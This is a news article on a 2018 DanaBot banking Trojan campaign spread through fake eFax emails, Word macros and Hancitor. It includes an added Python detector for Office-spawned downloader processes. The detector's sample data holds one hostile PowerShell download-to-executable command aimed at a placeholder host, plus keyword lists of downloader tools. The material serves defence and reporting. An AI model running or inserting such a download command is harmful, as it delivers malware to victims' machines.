The DanaBot banking Trojan traditionally ran campaigns that targeted Australian and European banks, but new research shows a new campaign that is targeting banks in the United States as well.
DanaBot is a modular Trojan written in Delphi that attempts to steal account credentials and information from online banking sites. It does this through a variety of methods such as taking screenshots of active screens, stealing form data, or logging keystrokes made on the computer. This stolen information is then collected and sent back to a central server, or command & control server, where it can then be accessed by the attackers.
When ProofPoint first discovered DanaBot, a single group was using it to target Australian banks. As time went on, other actors began using the banking Trojan to target other regions. Because each new campaign uses a different ID in its server communications, ProofPoint believes that DanaBot is being marketed as part of an affiliate system where actors can either share in the profits or rent the malware from the developer.
The North American campaign discovered by ProofPoint is being spread through malspam that pretends to be digital faxes from eFax. These emails state that the recipient has received a fax and then prompt the user to download it.
When the recipient clicks on the download button, they will download a malicious Word document that pretends to be the eFax. When opened, the document instructs the user to click on the "Enable Content" button to properly view it.
Once a user clicks on the Enable Content button, Word macros will fire off and download and install Hancitor on the victim's machine. Hancitor will then download DanaBot and other malware, such as Pony, onto the computer.
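The chain described above (Office document with macros enabled, then a downloader fetching the next stage) leaves a characteristic trace in endpoint telemetry: an Office process spawning a scripting or command-line child whose command line carries a download indicator. The script below is an added example written for this article, not code from the article or from ProofPoint; the process-creation events are constructed for the example, the field names (`parent`, `image`, `cmdline`) are an assumed generic schema rather than any vendor's format, and the URL and paths are placeholders.

```python
"""
Flag Office-spawned downloader activity in process-creation logs.
Added example for the DanaBot/Hancitor article; sample data is constructed.
"""
import json

# Office hosts whose child processes deserve scrutiny (assumption: names as on Windows).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Children a malicious macro commonly uses to fetch and run a payload.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
}

# Substrings (matched case-insensitively) that suggest a download in a command line.
NETWORK_HINTS = (
    "http://", "https://", "downloadstring", "downloadfile",
    "invoke-webrequest", "-urlcache",
)

# Constructed sample events in JSON-lines form. Not real telemetry; the host
# names, timestamps, URL and file paths are placeholders for this example.
SAMPLE_EVENTS = r"""
{"ts":"2018-10-01T13:02:11Z","host":"WS01","event":"process_create","parent":"outlook.exe","image":"winword.exe","cmdline":"winword.exe /n C:\\Users\\a\\Downloads\\efax_1234.doc"}
{"ts":"2018-10-01T13:02:40Z","host":"WS01","event":"process_create","parent":"winword.exe","image":"cmd.exe","cmdline":"cmd /c powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x','C:\\Temp\\x.exe')"}
{"ts":"2018-10-01T13:05:00Z","host":"WS02","event":"process_create","parent":"winword.exe","image":"splwow64.exe","cmdline":"splwow64.exe 12288"}
{"ts":"2018-10-01T13:06:00Z","host":"WS03","event":"process_create","parent":"explorer.exe","image":"powershell.exe","cmdline":"powershell -File C:\\scripts\\backup.ps1"}
"""


def analyze(events_text):
    """Return a list of alert dicts for Office parents that spawn downloader-like children.

    Severity is 'high' when both the child image and the command line look
    suspicious, 'medium' when only one of the two conditions holds.
    """
    alerts = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("event") != "process_create":
            continue
        parent = ev.get("parent", "").lower()
        image = ev.get("image", "").lower()
        cmdline = ev.get("cmdline", "").lower()
        if parent not in OFFICE_PARENTS:
            continue  # only Office-spawned children are in scope here
        reasons = []
        if image in SUSPICIOUS_CHILDREN:
            reasons.append(f"office parent spawned {image}")
        if any(hint in cmdline for hint in NETWORK_HINTS):
            reasons.append("command line contains a download indicator")
        if not reasons:
            continue  # e.g. the print helper splwow64.exe is a benign Word child
        alerts.append({
            "ts": ev.get("ts"),
            "host": ev.get("host"),
            "parent": parent,
            "image": image,
            "severity": "high" if len(reasons) == 2 else "medium",
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

On the constructed input only the WS01 event where winword.exe launches cmd.exe with a DownloadFile call is flagged; the benign print-spooler child on WS02 and the administrator's PowerShell on WS03 (spawned by explorer.exe, not Office) are ignored. Tuning the lists to the environment, for instance adding outlook.exe as a parent of interest, is the main knob.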
According to security researcher TomasP, the U.S.-based banks targeted by this new DanaBot campaign include Bank of America, Wells Fargo, TD Bank, Royal Bank, and JP Morgan Chase.
#Danabot meets America...— TomasP (@0xE9FBFFFFFF) October 1, 2018
North American banks freshly added to a new Danabot config:
ProofPoint has been tracking the various campaigns that are utilizing DanaBot and has identified 9 different actors distributing the Trojan. These actors are identified by an "affiliate id" that is part of the C2 communication header.
For the most part, each actor distributes DanaBot to a specific region, with only Australia being the target of two different affiliate ids. Furthermore, each affiliate id is utilizing different distribution methods such as web injects, the Fallout Exploit Kit, various malspam campaigns, and as in the current campaign, installations through the Hancitor malware.
In addition to an affiliate system being used, ProofPoint has found similarities between how DanaBot and the CryptXXX Ransomware communicate with their respective command & control servers. This leads the researchers to believe that the developers created DanaBot as part of an evolution of CryptXXX.
"Thus it would seem that Danabot follows in a long line of malware from one particular group," stated the ProofPoint report. "This family began with ransomware, to which stealer functionality was added in Reveton. The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot."
10/3/18: Updated to include list of targeted U.S. banks